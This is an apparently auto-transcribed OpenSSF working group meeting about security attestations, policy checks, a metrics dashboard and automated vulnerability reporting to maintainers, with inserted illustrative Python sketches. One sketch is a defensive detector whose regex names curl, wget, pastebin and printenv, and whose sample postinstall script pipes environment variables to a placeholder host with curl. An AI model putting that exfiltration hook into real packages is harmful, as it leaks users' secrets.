B: If anyone's offended by that, they haven't told me, so we're gonna keep doing that.

E: Yeah, I have told you the story about the telephone, haven't I?

E: I don't think it took them that long, but I mean, it was a social challenge, and Bell lost; I think it was Edison who wanted "hello" or "hi", and Bell wanted "ahoy-hoy", and we don't do it.

F: IBM got a pass because Unix started to change the landscape, but AT&T had a natural monopoly, and to make a long story short, after fighting it for several years AT&T finally capitulated and said: okay, we want to be a long-distance company, because that's where the money is; we still want to make big pieces of hardware, you know, the old switching infrastructure, Western Electric, Lucent; and we still want to do research in the labs.

F: Some smart reporter in the back of the room said: what about that wireless technology that they've been trialing in Chicago? Up until that point, the most prolific wireless technology was called SMR, Specialized Mobile Radio; you know, the push-to-talk "hey Charlie, bring some more parts over to the job site," which is more analogous to having a large FM antenna broadcasting over a large area. But they had actually been in trials with early first-generation cellular in Chicago. And AT&T, and even their expensive consultants, had told them that, oh, by the year 2000 there might be a million people using this newer stuff.

F: So when the reporter asked about it, the government didn't know what they were talking about. The executive from AT&T and the government turned away from the podium for a second: what's this about? Well, it's this. And, well, is it more like local or long distance? And the executive answered honestly: well, it's more like, you know, local, a local call. Well, that'll go over to the Bells; okay, fine!

F: That's how it happened: they literally turned back to the podium and announced that AT&T gave away the intellectual property and rights to what became AMPS, the Advanced Mobile Phone System, and they had to buy it back some 12 to 15 years later for billions of dollars.
B: All right, awesome. Welcome, everybody, to the October 26th Identifying Security Threats working group meeting. I will be your host. Is there anybody new who has not been here before? I don't think so, yeah?

B: That's gonna be happening on October 28th; this is this Friday, in two days, so you are welcome to join and participate. Look at the OpenSSF Slack channel for details on the office hours. I haven't seen an invite for it, so I'll ping the channel and see how the OpenSSF folks are joining, because I think the projects that would attend needed to fill out a registration, so we'll also see if anybody registered.
B: It is possible that that will be delayed; we're not going to push it out until those important things get done. But best case, it'll be on this coming Tuesday. Then the security review video walkthrough: this is another channel, I think it's called "security review video". That will be happening on November 7th, so this is next...

B: ...like a week and a Monday from now. Everybody's welcome to join; we'll take an open source project and we will interactively, and, you know, live, do a security review of it. So we'll run tools and triage and kind of do everything we can in an hour. We're going to choose a pretty small package to do this.

B: It will not be published until we're confident that we haven't found any interesting zero-days, because we want to get those fixed before we publish. But in all likelihood we'll publish it, and it'll also be something that we'll iterate on. So if you're interested in participating, please ping the channel or just join on November 7th. It's on the OpenSSF.
B: Let's see, the LF Member Summit: I believe that is November, like, 11 to 15, or I might have the dates wrong, but...

F: Monday's arrival day, Tuesday keynotes and sessions, and then more sessions on Wednesday and Thursday. The...

B: ...week of November 7th. Cool, thank you. And then finally, the virtual summit for maintainers of critical open source software, which I think we need a short name for. It looks like that is going to be... I believe we said January for that.
C: The date has not been finalized yet. I mean, we were looking to finalize it yesterday, but people are at KubeCon and other events, so we didn't have the meeting yesterday. But I mean, there's no reason for it not to be mid-January; we just want to analyze the data. We'll...

B: ...finalize the date, probably mid-January. So I want to go into project updates, for the folks we have who can talk to these things. For security reviews, I need to connect with him offline for a couple of things, so I'll try to get an update from him. I haven't seen... you know, this seems to just be kind of steady, new reviews dribbling in here and there. For Alpha-Omega...
B: ...on November 1st we'll give them kind of the full update, including the stuff that's in the annual report. But we're looking at... oh, I don't know if I should announce this; yeah, sure, why not. So we have our first hire, although I'm not gonna say their name, because reasons. Yeah, okay, so we have a first software engineer...

B: ...hire. Super, super excited to have this person starting, hopefully in the middle of November, working on Omega and the tooling and orchestration and whatnot that we're going to need to find lots of vulnerabilities as part of that. And this is... I would love to get input on this; I posted a note in the Alpha-Omega Slack channel and, I think, on a GitHub issue in Alpha-Omega.

B: Basically, I would like to be able to publish assertions that security validation work has been completed against an open source project, in a way that is consumable via a policy-driven, you know, whatever Bob thing, and have that be as streamlined and automated as possible.
B: So, the same way that... we did an experiment about six months ago, I think most of you are aware, where we ran a bunch of tools against a piece of open source. When they came back clean, meaning no CodeQL findings, no Semgrep findings, it was reproducible, and no public vulnerabilities; I think maybe there was one more check, but a finite number of checks. When they all came back totally clean...

B: ...then we asserted that through a security review: you know, text, a template that we stuck out and published. And that's great for reading, but it's not awesome for consuming. So what we were thinking is doing something... in fact, I should just...

B: So imagine a world where we run lots of tools against a piece of open source, and, I'm hand-waving on the lower-level design of this, but let's say for each tool, it can have some sort of output: it can either find one or more issues, not find any issues, or maybe fail to run, or something.
B: We'd provide enough information out to a consumer so that they can say: for left-pad 1.3, what do we know about it?

B: Well, we'll know that it was scanned by seven different tools and that no critical findings were discovered; or it was scanned and three critical findings popped out, but after triage they were all false positives, so the net was zero; and lots of other things. It was, you know, reproducible...

B: ...and, I mean, in theory, it had these Scorecard values at this point in time, and anything else like that. And you push this into what is probably going to be an in-toto assertion or an in-toto attestation; I'm using "assertion" and "attestation" and getting the two words confused, but a statement of that fact, and then, you know, it's signed and all that stuff. And then you as a consumer can just say, you know...
B: ...look in my, you know, my lock file, my list of open source I use; look at the metrics dashboard for left-pad and you can see the stuff; and you can say, apply my policy, and my policy says I can only use projects that have had two or more static analysis tools run against them in the past year and have had zero critical findings pop out of that, or whatever you want to express as part of your policy language.
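(As a rough illustration of the idea being described here, a statement that certain checks ran against a specific package version plus a trivial consumer-side policy over such statements, a minimal sketch follows. The field names, values, and policy are hypothetical, invented for this example rather than taken from the discussion; a real system would presumably use an in-toto-style attestation layout with proper signing.)

```python
# Hypothetical sketch only: the schema and policy below are illustrative, not an agreed format.
from datetime import date

# A single "assertion" that some security validation ran against left-pad 1.3.0.
assertion = {
    "subject": {"ecosystem": "npm", "name": "left-pad", "version": "1.3.0"},
    "issuer": "openssf-omega",             # the identity making the claim (would be a signing key)
    "issued_on": date(2022, 10, 26).isoformat(),
    "checks": [
        {"tool": "codeql", "result": "no_findings"},
        {"tool": "semgrep", "result": "no_findings"},
        {"tool": "reproducible-build", "result": "pass"},
    ],
    "open_critical_findings": 0,            # findings still open after triage
}

def satisfies_policy(assertions, min_static_tools=2, max_critical=0):
    """Toy consumer policy: at least N static-analysis tools ran, and no
    critical findings remain open after triage."""
    static_tools = {c["tool"] for a in assertions for c in a["checks"]
                    if c["tool"] in {"codeql", "semgrep"}}
    worst = max((a["open_critical_findings"] for a in assertions), default=0)
    return len(static_tools) >= min_static_tools and worst <= max_critical

print(satisfies_policy([assertion]))  # True under this toy policy
```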
B: I think that's, like, the elevator pitch here. I've got lots of open questions on how this would actually work, but I want to open this up for thoughts and whatnot. And please, obviously we can talk now, but if we can throw comments over there, so it's more public, that would be awesome too. Any thoughts?

C: So I'm wondering, like, who's gonna be producing these things. Is it going to be produced by, like, Alpha-Omega, the Omega side doing the scans and producing these attestations, or is this going to be run by the maintainers, and they will somehow have some process of automatically generating these things?
B: So I think it needs to be run by... that's right, it shouldn't be Omega only; I don't think it should be the maintainers themselves. It should...

B: ...be a trusted third party. So the trusted third party is asserting to you, the consumer, that this artifact, that, like, an anonymous maintainer created, is trustworthy, or, you know, the level of trustworthiness of that thing. So you can't attest it yourself, because you're biased. And while, yes, I would imagine Omega would produce lots of these, a consumer of this would be able to say: I don't trust anything these...

B: ...you know, Omega people are doing; I'm only going to trust things that some other third party provides. So I would want this attestation, assertion, database to be public: like, I guess, anybody can push to it, and then it's on the consumption side that you filter down to the trusted roots that you want to respect and value.
B: I definitely think it has a place to be shown in some way within, definitely, the... and Jay and Christina, or everybody: I'd welcome feedback on where this could fit in the metrics dashboard. I think Scorecard... could it? I mean, it feels like it fits, so that would be interesting. Building it into the underlying tooling, like "npm install --policy=strict", like that, might make sense; or just a separate tool, so you do, you know, "npm validate my-thing --policy=strict".
B: You know, I think building this giant database of assertions is going to be relatively easy, and building the policy evaluator is also pretty easy. I think you're right in what you touched on, which is, like, the actual consumption of this, showing that this has value, and, like...

B: ...but what about, like, what would an end consumer actually do with this information? So I'm a developer, I want to use Foo. So I do a policy check on my thing, on Foo, and it says: two tools have been run against it, it's not reproducible, there's one potentially moderate-level security issue, but it hasn't been triaged.
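(Purely for illustration, the kind of summary such a hypothetical policy check might surface for a package could look like the sketch below. The record fields and output format are invented, not something proposed in the meeting.)

```python
# Illustrative only: a made-up summary record and a tiny renderer for it.
summary = {
    "package": "foo",
    "tools_run": ["codeql", "semgrep"],
    "reproducible": False,
    "findings": [{"severity": "moderate", "triaged": False}],
}

def render(s):
    lines = [f"{s['package']}: {len(s['tools_run'])} tools run ({', '.join(s['tools_run'])})"]
    lines.append("build reproducible" if s["reproducible"] else "build NOT reproducible")
    untriaged = [f for f in s["findings"] if not f["triaged"]]
    lines.append(f"{len(untriaged)} untriaged finding(s)")
    return "\n".join(lines)

print(render(summary))
```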
E: Okay, I mean, I could tell you what would be next, you know, given that. But nothing that was told to me ahead of time would say, well, how long have they had... how much time have they had to triage? If they just got that report yesterday, goodness gracious; you know, there are very few organizations that can guarantee 24-hour analysis. But if it's been sitting in their queue for nine months, I would worry a lot.

E: You know, it's not reproducible: not good, but not unusual. On the other hand, and this is something I mentioned to the dashboard folks, if it used to be reproducible and now it's not; or, you know, not only is it not reproducible, but it says it's version 1.0.1 and the latest version in the source code...

E: ...repo is 1.0.0: that looks more like somebody broke into the package repo. So, you know, in all of this you're trying to get an estimate of how much risk am I taking on, and things that suggest especially unusual amounts of risk, I think, are what you're looking for primarily. We've had a discussion, for example, about single-person projects. I do think that single-person projects by definition are riskier.

E: Are they unusual? No, they're an incredibly common case, so saying "I'll never use a single-person project" isn't really reasonable. It's not clear how... I mean, by itself you're not getting a lot of risk. It is a risk indicator; it's not by itself a high risk, but it's a high risk if it's combined with other indicators like...
G: Hello. So, yeah, I had a question. When it comes to the triage, the filtering: you're saying anybody can write to it. So do we really know how to filter, knowing, you know, who ran the tools, what tools exactly it was? Was that the genuine, you know, Alpha-Omega tool, or was that some kind of, you know, fork that somebody...

B: Well, so I imagine the schema would need to be expressive enough to convey what was actually done. So on one hand, you could just say "I ran a tool"; on the other hand, you could say "here's the command line and the environment, and here's the link to its actual output," or it's a containerized thing that should reproduce the same results; you could go anywhere on that spectrum. But I...
B: ...think at the end of the day, though, the actual assertion is the private key of the entity that's making the assertion, that is putting their reputation behind saying that this thing is authentic. I don't think there's a way to get around that. I mean, I suppose you could have a thing where you only trust assertions if you have identical content from two or more parties; you could do, like, multi-party...

B: ...you know, assertions. But I think it would still be up to you, the consumer, or a proxy for you who's making kind of judgment calls here, to say that these three entities are top-level trustworthy to make assertions, and by default the tooling only cares about what they say.

B: Or, you know, you could make up your own root and do a thing. But I think it should be a relatively open system that multiple parties can contribute to and multiple parties can consume from, but...

G: ...yeah, that makes sense; I think that makes sense, I agree. It has to be rich enough in content, so, you know, the context in which it was run, which version of the tool exactly was used, and so on, right. Yeah, and then it's the consumer's responsibility to decide who they want to trust, as always.
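(A consumer-side filter along those lines, keeping only assertions from issuers on a locally configured trust list and optionally requiring that more than one independent trusted issuer covers the same package version, might look roughly like this sketch. Everything here is illustrative; in particular, signature_ok is a placeholder for real cryptographic verification, for example Sigstore-style, not an existing API.)

```python
# Sketch only: the consumer decides which assertion issuers to trust.
TRUSTED_ISSUERS = {"openssf-omega", "another-third-party"}

def signature_ok(assertion):
    # Placeholder: a real system would verify a cryptographic signature against
    # the issuer's identity (e.g. via Sigstore), not just check that a field exists.
    return "signature" in assertion

def trusted_assertions(assertions, trusted=TRUSTED_ISSUERS, min_issuers=1):
    """Keep assertions whose issuer is on the trust list; optionally require
    that at least `min_issuers` distinct trusted issuers cover the same
    package version before any of them is believed."""
    kept = [a for a in assertions if a["issuer"] in trusted and signature_ok(a)]
    issuers_per_subject = {}
    for a in kept:
        subject = (a["subject"]["name"], a["subject"]["version"])
        issuers_per_subject.setdefault(subject, set()).add(a["issuer"])
    return [a for a in kept
            if len(issuers_per_subject[(a["subject"]["name"], a["subject"]["version"])]) >= min_issuers]
```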
B: Cool. If you do have more thoughts, please throw them in the issues.

B: I think that this... well, I mean, I'm hoping to be able to make progress here in the next, like, two to three months, to have something that we can kind of show and argue about in, you know, concrete terms. Let's see; so, Assimilation: I don't have any new information on this, it's just bandwidth on my side. I still think that it's a reasonable idea.

B: I should take this to... I think I promised Hack that I would take it to them in the next...

B: ...you know, two months or so. Assimilation was the open source security ecosystem sim, where we monitor new publish events and look at various indicators of risk around the metadata; not the content, but, like, you know, is it mining cryptocurrency when it's installed, or dumping environment variables over to Pastebin, or whatever, things like that. So, more to come there. If you're interested in participating in this, you know, we can move it forward at the rate of participation.
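(For context, the kind of metadata-level indicator being described, such as flagging a newly published package whose install hooks reach out to the network or dump environment variables, could be approximated by a check along these lines. The heuristics, field names, and example are illustrative guesses, not the project's actual rules.)

```python
import json
import re

# Illustrative heuristics over npm-style package metadata for a newly published version.
SUSPICIOUS_INSTALL = re.compile(r"curl|wget|pastebin|printenv|process\.env", re.IGNORECASE)

def risk_indicators(package_json: str):
    """Return coarse risk flags from a package.json blob; a real analysis would
    also inspect the unpacked tarball contents, not just the metadata."""
    meta = json.loads(package_json)
    flags = []
    for hook in ("preinstall", "install", "postinstall"):
        script = meta.get("scripts", {}).get(hook, "")
        if SUSPICIOUS_INSTALL.search(script):
            flags.append(f"suspicious {hook} script")
    if not meta.get("repository"):
        flags.append("no linked source repository")
    return flags

example = json.dumps({
    "name": "example",
    "version": "1.0.1",
    "scripts": {"postinstall": "curl -d \"$(printenv)\" https://example.invalid"},
})
print(risk_indicators(example))  # ['suspicious postinstall script', 'no linked source repository']
```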
B: Basically. Security Insights: I don't see Luigi, so we'll hold off on that. I already talked about the security review walkthrough. The metrics dashboard: we have a bunch of time to talk about this, so is there anything new that you folks want to talk about with the metrics dashboard, and the metrics dashboard stuff, yeah?

E: I think it's key to note that, I mean, there's a whole different SIG focused on this, so if you're interested in that, go to its meetings. But for this group, the quick summary is: we've talked together, there are some various things, and I think one of the next steps is basically identifying potential...

E: ...metrics users. We've already at least made a first cut at identifying users and what they need, and, you know, then after that I think the goal is to have some sort of very simple, rough idea of what it would look like, based on what metrics.openssf.org, LFX Security, Scorecards, the Best Practices badge, many of the CHAOSS metrics, and many other sources have done, this kind of thing.
D: Cool, and just to add on, let me know, because... so we also discussed, and this is along with what David was just talking about, the type of metrics and whether or not the... I had my notes up in front of me just now; now they're not there anymore... the type of metrics and whether or not we're focusing on projects, products or...

D: ...products, projects, and processes. Also perhaps collaborating with other working groups as well; so, understanding, taking from the Critical Projects working group, and ID'ing projects that have the largest impact, and perhaps focusing metrics on these in the beginning, right. And then, you know, so we talked about that as well. We also discussed a few housekeeping items, talking about GUAC as well, about getting data and all that kind of stuff.

D: A few other things here: we handled some issues around meeting times. There was some meeting time confusion, so, right along with what David said, get involved, and the meeting times should all be accurate now, so we shouldn't have those kinds of issues there.
E: Let's see, I think I'll probably check to find the next meeting. I...

D: ...think the next meeting is the 28th, so on Friday; Friday will be the next meeting. So look for that on the calendar, which should be updated properly. I don't see it... you don't see it? Okay, let me check here and make sure.

B: Let's... I have two different meetings at the same time for the same topic, so...
E: I also have an OpenSSF SIG risk meeting. That was... I believe what happened is that's created when you log... when you...

E: ...with the LFX registration.

H: The one that you got through our "register an individual" link is going to show up at, say, 11 Eastern, and then the other one, the public one, is going to show up as 12 Eastern.

D: So it should... the meeting should happen at the 12, at 12 p.m. Eastern, 9 a.m. Pacific; that meeting should happen. The other one, the... what, the 8 a.m. or 11 a.m. one, on the 18th, that one isn't it. And I think that... so that speaks to what Christine was saying: the LFX platform might not... the calendar might not have been adjusted for daylight saving time, right.
E: Exactly, and I just... I suspect the challenge is, if you set it as, say, an East Coast meeting time, that's one time, but if you set it as a UTC time, yeah, then it will not...
E: I would add one more thing. I mean, there were a number of topics discussed, but I think one of the other challenges was exactly what are you evaluating, and there were multiple possible answers to that. You could evaluate a project. You could evaluate a project as represented by a specific repo.

E: You could evaluate a package, or you could evaluate a specific version of a package. And, you know, basically you can kind of see the links flowing the other way: if you're looking at a version of a package, you also end up evaluating the package in general, and that hopefully links to a source code repo where that package is generated from, and then there are questions you can answer there.

E: It's not clear to me what the MVP needs to be, but I think it needs to at least cover packages and project repos; but, you know, that's to be determined.
E: Yeah, that would be interesting to enforce, though. I just recently got, and my apologies for the inside baseball, some proposed legislation for the U.S. Department of Defense, and they want them to look and be aware... you know, they want to only accept components, software with components, with no known vulnerabilities that are exploitable. Now, it's the "are exploitable" part that's critical, because obviously, in a vast number of cases, just because there's a known vulnerability...

E: I think that trying to expect that, hey, we're slamming the brakes and not accepting the software we've been accepting for 40, 50 years, and we're going to suddenly change everything... yeah, it's the speed of change that I think is unreasonable, not the destination.
B: Which kind of goes, sorry, goes back to that angle where it's not, not even... I think the biggest benefit is that you take something from what is an unknown unknown, I guess, to a known known. I'm sorry, but, like, a package that you have no information on, right: knowing that it has a vulnerability is actionable, because you can decide, like, I'm not...

B: ...whereas one that has been evaluated and has some data to suggest that it is safe, while not actionable, meaning you wouldn't do anything with it, means you should sleep better, knowing that of your entire supply chain, eighty percent of it you should worry very little about, and this twenty percent you should worry more about, as opposed to having to distribute your worry across all of them, right.

B: Cool. Is there anything else we'd like to talk about?
C: So, Michael, I would like to talk about... so we've been working on this, like, a separate project with you, on the PyPI repository scanning. Basically, we did some experiments and we submitted some results. We were trying to figure out what are the ideal ways of communicating the results to, you know, the maintainers and having them fixed; and, I mean, not necessarily vulnerabilities, but at least the security hardening, just for that.

C: So at some point I would like to get some guidance on what we should do next, or how we can move this forward. I mean, this is somewhat tangentially related to the automated security reviews; this could be part of, like, automatic... even, like, attestations, etc., those could be generated, and that's why, I mean, it's tangentially related. But at some point, maybe; I don't know whether it is the time...

C: ...but at some point we need to discuss how we can move that particular project. I...
B: So, just to clarify the particular question, for everybody else: the scenario is, you have a magic black box that generates what you believe to be high-quality vulnerabilities, but a lot of them. So you want to automate, to the extent possible, or minimize person-time in, getting these out to authors. And what we've all learned is that the perception of this kind of drive-by, bot-driven "hey, a tool found a thing...

B: ...so you should definitely, like, stop everything and fix it": maintainers often react viscerally to that. And is there a better...
C: In the small experiment that we did, we submitted 25 automated... actually manually created, but they appeared to be automated; they were all manually created. And there were only two projects which had negative reactions, and one of them was because of a mistake that, like, our guy who was doing the stuff made; yeah, he was not following the right protocol, so it was not that.

C: But what we also understood, and part of that fact is: out of the 25 that we submitted, I think 12 got merged within, like, two or three days. So that's a high number of bugs that were immediately accepted, and so on; that's the actual data that I've shared before. And so there's some value to that. In the end, we would like it to have something like, you can call it an attestation...

C: ...you could call it a quality gate, but like that. And so that's why I was asking about who's going to be consuming these attestations. I mean, down the line, in the distant future, maybe we can have, let's say, for any project or any library to be in PyPI, it has to pass through attestation by somebody, or it's just not featured there. I mean, so we create a gate, and that way we collectively upgrade the process.
C: And then this could be a part of that vision. So, what we would like to do now... but at the same time, like, about this drive-by fixing or suggestion thing, there's also politics that is involved, which is, like: if, let's say, our company, OpenRefactory, suddenly comes up and does that, it might sound like a PR campaign, which is how people perceived it in the one or two places where it was...

C: ...where it was perceived as a PR campaign, which it wasn't. But if it is coming from, let's say, the OpenSSF, or PyPI, or some other authority, then that collaboration or that stamp of approval is also important, because then people trust it more; it's just how human nature is, yeah, how people react. So these are the places where we need to discuss and figure out how we can move this thing ahead. At a minimum...

C: ...what we really need is to scale this. Right now we are scanning, like, 200 projects. We want to scale it to, as the goal of Omega is, 10,000 and beyond; like, why not the 430,000 of PyPI? So that's kind of the... and in order to do an experiment of that scale or extent, we would need some support on infra or something, to scale this.
C: It's definitely in Omega's camp, and further, to build it, it can as well apply to Alpha; it doesn't matter. So the big vision is to basically build a dashboard of some sort where, in the background, we run the Alpha-Omega toolchain, we also run iCR, we run some other tool that also comes in, and all the results are consumable together; all of them come to the dashboard, to a maintainer.

C: Because the result is highly concentrated at that point, it is feasible for that person to actually triage, and then from that we generate the pull request. Then the software maintainers come in and fix that, and collaboratively we do rinse and repeat on that, project after project, and so on. So it's not really related to just us.

C: The big picture that I actually see is to, I mean, run both the Docker image for the 22-something tools that Omega has, as well as our tool, as well as some others in the future, but create this framework where these are reported back to the maintainers and then they fix it, and we have a process of tracking that as well, yep.
B: So it'd be really hard for me to say that Omega shouldn't play a role here. We did start out building a dashboard for Omega to glob together all these results so you could triage it efficiently and all that stuff, and so that project exists and it's maybe 50 percent done.

B: Probably maybe another two months of work to get it in good shape. But we've also said that we trust ourselves less to run an operational service that collects and stores and manages zero-days at scale than we do to just buy some high-end workstations and have folks work locally.

B: We can still run the website locally, so they have a nice experience. But, like... so that was kind of our thinking on why we took our foot off the gas for that triage portal. But... so there was a doc that we wrote, basically saying: whenever a, we described it as a commercial entity, comes to us and says, hey, we want to work with you, Alpha-Omega, like, we have a really super sharp tool, we want to...
B: ...we want to use it: the way that we did this for CodeQL and for Snyk is we just have them integrated into the Docker container, so we run them locally. You know, for Snyk we have an API key that they gave us, so we can run that; if you don't have the API key, it's not going to run, things like that. For services that we would not be able to run ourselves, so things that are, you know, just generically...

B: ...you know, a vendor-run thing, to be able to consume results at scale: so we haven't... There's a security researcher in Europe somewhere, I'm blanking on his name, but he developed another static analysis tool for Python and he ran it across everything, and he had this, like, 40-gigabyte JSON output, you know, that he shared. And at that scale, like, what's he gonna do with that? Like, you can't, you know, go through that.
B: So what I would like to have Omega develop muscle for is consuming results at scale and operationalizing the triage and everything else. We met with GitHub Security Lab last week, I think it was last week, talking about their approach, and, you know, they do both. Vertical, so they'll look at a particular project, look for all the vulnerabilities, triage them all, and then report out; but they found just better success in going horizontal, where they look for just one vulnerability...

B: ...class across, you know, hundreds or thousands of projects, and then try to, you know... because I think the presumption was that the analyst is more focused when looking at one particular type of issue across lots of projects than at every issue across one. Either way, though, I think it'll make sense; like, I don't see any reason why Omega should not consume, like, from OpenRefactory, and do that last-mile triage and reporting, because at the end of the day the vulnerability gets fixed and everybody in the chain gets a point.

B: So, you know, we don't need to generate the vulnerability ourselves from our own rules; like, you know, that we don't care about. So I feel like that makes sense.
C: And fundamentally, we don't have any problem even connecting with the Docker container and so on, so that's not the hard problem here. The hard problem, and the interesting one, and the one that is good for the world, is really: how do we manage the triage and bring it to the maintainers? How quickly can this be done, and maybe, like, how isolated can this be done as well? Maybe this is not public.

C: Maybe this is just a private dashboard, but then accessed by Alpha-Omega people, and then we do a coordinated disclosure through that; everything doesn't need to be public, right. So, I mean, these are the things that I would like to discuss, and perhaps get some... I mean, and get it assimilated with some of the other efforts that we are doing, and we can figure out a common ground, yeah.
B: I would love... so we've talked about this in, like, now, like, five or six different forums. I would really like to land on what the correct workflow is for reporting vulnerabilities to maintainers in an automated way.

B: Because as soon as we can answer that question, and we feel good about the answer, then we can, you know, execute on it. That kind of takes away, you know, the longest and most painful part, which is that back and forth.

B: So whether that's, you know... if GitHub ever gets private issues, that would be great. If CERT VINCE, and maybe it's there already and we're just ignorant of it, but if CERT VINCE can be used for this... I mean, we could look at things like HackerOne or Bugcrowd or one of those, where we kind of white-box out a solution where they handle the last mile and we just pay them for that service; like, that works too. But I think we need to...
B: If we don't answer that question, then Omega will be stymied by, like, an ever-increasing response workload and less time on the core part of the business. So that's what I'm thinking. So, I mentioned I have one person starting in a few weeks; I'm hoping to have another person start, also in a few weeks. As we get that team, you know, so it's probably early December, so about a month or so from now...

B: ...let's have that conversation in earnest and start driving to a solution there.